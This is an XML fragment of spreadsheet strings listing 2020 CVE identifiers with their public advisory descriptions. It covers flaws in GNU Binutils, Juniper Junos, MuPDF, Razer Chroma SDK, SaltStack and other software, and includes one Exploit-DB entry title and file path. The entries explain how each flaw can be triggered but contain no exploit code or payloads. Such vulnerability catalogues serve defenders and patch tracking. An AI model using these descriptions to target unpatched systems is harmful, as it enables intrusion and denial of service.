    <t>A double free vulnerability exists in the Binary File Descriptor (BFD) (aka libbrd) in GNU Binutils 2.35 in the process_symbol_table, as demonstrated in readelf, via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-16591</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in the Binary File Descriptor (BFD) in GNU Binutils 2.35 due to an invalid read in process_symbol_table, as demonstrated in readeif.</t>
  </si>
  <si>
    <t>CVE-2020-16592</t>
  </si>
  <si>
    <t>A use after free issue exists in the Binary File Descriptor (BFD) library (aka libbfd) in GNU Binutils 2.34 in bfd_hash_lookup, as demonstrated in nm-new, that can cause a denial of service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-16593</t>
  </si>
  <si>
    <t>A Null Pointer Dereference vulnerability exists in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35, in scan_unit_for_symbols, as demonstrated in addr2line, that can cause a denial of service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-16599</t>
  </si>
  <si>
    <t>A Null Pointer Dereference vulnerability exists in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35, in _bfd_elf_get_symbol_version_string, as demonstrated in nm-new, that can cause a denial of service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-1660</t>
  </si>
  <si>
    <t>When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing "URL Filtering service", may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.</t>
  </si>
  <si>
    <t>exploits/windows/remote/49106.py</t>
  </si>
  <si>
    <t>Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution</t>
  </si>
  <si>
    <t>2020-11-26</t>
  </si>
  <si>
    <t>CVE-2020-16600</t>
  </si>
  <si>
    <t>A Use After Free vulnerability exists in Artifex Software, Inc. MuPDF library 1.17.0-rc1 and earlier when a valid page was followed by a page with invalid pixmap dimensions, causing bander - a static - to point to previously freed memory instead of a newband_writer.</t>
  </si>
  <si>
    <t>CVE-2020-16602</t>
  </si>
  <si>
    <t>Razer Chroma SDK Rest Server through 3.12.17 allows remote attackers to execute arbitrary programs because there is a race condition in which a file created under "%PROGRAMDATA%\Razer Chroma\SDK\Apps" can be replaced before it is executed by the server. The attacker must have access to port 54236 for a registration step.</t>
  </si>
  <si>
    <t>CVE-2020-16608</t>
  </si>
  <si>
    <t>Notable 1.8.4 allows XSS via crafted Markdown text, with resultant remote code execution (because nodeIntegration in webPreferences is true).</t>
  </si>
  <si>
    <t>CVE-2020-1661</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5.</t>
  </si>
  <si>
    <t>CVE-2020-16610</t>
  </si>
  <si>
    <t>Hoosk Codeigniter CMS before 1.7.2 is affected by a Cross Site Request Forgery (CSRF). When an attacker induces authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.</t>
  </si>
  <si>
    <t>CVE-2020-1662</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages: rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master) rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master) rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000 kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3.</t>
  </si>
  <si>
    <t>CVE-2020-16629</t>
  </si>
  <si>
    <t>PhpOK 5.4.137 contains a SQL injection vulnerability that can inject an attachment data through SQL, and then call the attachment replacement function through api.php to write a PHP file to the target path.</t>
  </si>
  <si>
    <t>CVE-2020-16630</t>
  </si>
  <si>
    <t>TI’s BLE stack caches and reuses the LTK’s property for a bonded mobile. A LTK can be an unauthenticated-and-no-MITM-protection key created by Just Works or an authenticated-and-MITM-protection key created by Passkey Entry, Numeric Comparison or OOB. Assume that a victim mobile uses secure pairing to pair with a victim BLE device based on TI chips and generate an authenticated-and-MITM-protection LTK. If a fake mobile with the victim mobile’s MAC address uses Just Works and pairs with the victim device, the generated LTK still has the property of authenticated-and-MITM-protection. Therefore, the fake mobile can access attributes with the authenticated read/write permission.</t>
  </si>
  <si>
    <t>CVE-2020-16632</t>
  </si>
  <si>
    <t>A XSS Vulnerability in /uploads/dede/action_search.php in DedeCMS V5.7 SP2 allows an authenticated user to execute remote arbitrary code via the keyword parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1664</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1665</t>
  </si>
  <si>
    <t>On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take affect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2.</t>
  </si>
  <si>
    <t>CVE-2020-1666</t>
  </si>
  <si>
    <t>The system console configuration option 'log-out-on-disconnect' In Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console the ability to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-1667</t>
  </si>
  <si>
    <t>When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing "URL Filtering service", can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.</t>
  </si>
  <si>
    <t>CVE-2020-1668</t>
  </si>
  <si>
    <t>On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host&gt; show chassis routing-engine Routing Engine status: ... Idle 2 percent the "Idle" value shows as low (2 % in the example above), and also the following command: user@host&gt; show system processes summary ... PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1669</t>
  </si>
  <si>
    <t>The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1670</t>
  </si>
  <si>
    <t>On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issue and traffic interruption. This specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter to the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1671</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting with the restart of the daemon. This issue only affects DHCPv6, it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; This issue does not affect Juniper Networks Junos OS prior to 17.4R1.</t>
  </si>
  <si>
    <t>CVE-2020-1672</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packet can trigger this issue. DHCPv4 packet cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1673</t>
  </si>
  <si>
    <t>Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user's HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device&gt; show system processes | match http 5260 - S 0:00.13 /usr/sbin/httpd-gk -N 5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-1675</t>
  </si>
  <si>
    <t>When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.</t>
  </si>
  <si>
    <t>CVE-2020-1676</t>
  </si>
  <si>
    <t>When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.</t>
  </si>
  <si>
    <t>CVE-2020-1677</t>
  </si>
  <si>
    <t>When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.</t>
  </si>
  <si>
    <t>CVE-2020-1678</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the "show task memory detail | match policy | match evpn" command multiple times to check if memory (Alloc Blocks value) is increasing. root@device&gt; show task memory detail | match policy | match evpn ------------------------ Allocator Memory Report ------------------------ Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes Policy EVPN Params 20 24 3330678 79936272 3330678 79936272 root@device&gt; show task memory detail | match policy | match evpn ------------------------ Allocator Memory Report ------------------------ Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes Policy EVPN Params 20 24 36620255 878886120 36620255 878886120 This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-1679</t>
  </si>
  <si>
    <t>On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronized the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when KRT queue become stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the following command to check if there is the KRT queue is stuck: user@device &gt; show krt state ... Number of async queue entries: 65007 &lt;--- this value keep on increasing. When this issue occurs, the following message might appear in the /var/log/messages: DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2 DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-1680</t>
  </si>
  <si>
    <t>On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2.</t>
  </si>
  <si>
    <t>CVE-2020-1681</t>
  </si>
  <si>
    <t>Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but a continuous receipt of the malformed NDP packets could leaded to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1682</t>
  </si>
  <si>
    <t>An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, NFX250, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D220 on SRX1500, SRX4100, SRX4200, vSRX; 17.4 versions prior to 17.4R3-S3 on SRX1500, SRX4100, SRX4200, vSRX; 18.1 versions prior to 18.1R3-S11 on SRX1500, SRX4100, SRX4200, vSRX, NFX150; 18.2 versions prior to 18.2R3-S5 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.1 versions prior to 19.1R3-S2 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.2 versions prior to 19.2R1-S5, 19.2R3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250. This issue does not affect Junos OS 19.3 or any subsequent version.</t>
  </si>
  <si>
    <t>CVE-2020-1683</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is memory leak caused by this issue: user@device&gt; show system virtual-memory | match "pfe_ipc|kmem" pfe_ipc 147 5K - 164352 16,32,64,8192 &lt;-- increasing vm.kmem_map_free: 127246336 &lt;-- decreasing pfe_ipc 0 0K - 18598 32,8192 vm.kmem_map_free: 134582272 This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3.</t>
  </si>
  <si>
    <t>CVE-2020-16839</t>
  </si>
  <si>
    <t>On Crestron DM-NVX-DIR, DM-NVX-DIR80, and DM-NVX-ENT devices before the DM-XIO/1-0-3-802 patch, the password can be changed by sending an unauthenticated WebSocket request.</t>
  </si>
  <si>
    <t>CVE-2020-1684</t>
  </si>
  <si>
    <t>On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2.</t>
  </si>
  <si>
    <t>CVE-2020-16843</t>
  </si>
  <si>
    <t>In Firecracker 0.20.x before 0.20.1 and 0.21.x before 0.21.2, the network stack can freeze under heavy ingress traffic. This can result in a denial of service on the microVM when it is configured with a single network interface, and an availability problem for the microVM network interface on which the issue is triggered.</t>
  </si>
  <si>
    <t>CVE-2020-16844</t>
  </si>
  <si>
    <t>In Istio 1.5.0 though 1.5.8 and Istio 1.6.0 through 1.6.7, when users specify an AuthorizationPolicy resource with DENY actions using wildcard suffixes (e.g. *-some-suffix) for source principals or namespace fields, callers will never be denied access, bypassing the intended policy.</t>
  </si>
  <si>
    <t>CVE-2020-16845</t>
  </si>
  <si>
    <t>Go before 1.13.15 and 14.x before 1.14.7 can have an infinite read loop in ReadUvarint and ReadVarint in encoding/binary via invalid inputs.</t>
  </si>
  <si>
    <t>CVE-2020-16846</t>
  </si>
  <si>
    <t>An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.</t>
  </si>
  <si>
    <t>CVE-2020-16847</t>
  </si>
  <si>
    <t>Extreme Analytics in Extreme Management Center before 8.5.0.169 allows unauthenticated reflected XSS via a parameter in a GET request, aka CFD-4887.</t>
  </si>
  <si>
    <t>CVE-2020-16849</t>
  </si>
  <si>
    <t>An issue was discovered on Canon MF237w 06.07 devices. An "Improper Handling of Length Parameter Inconsistency" issue in the IPv4/ICMPv4 component, when handling a packet sent by an unauthenticated network attacker, may expose Sensitive Information.</t>
  </si>
  <si>
    <t>CVE-2020-1685</t>
  </si>
  <si>
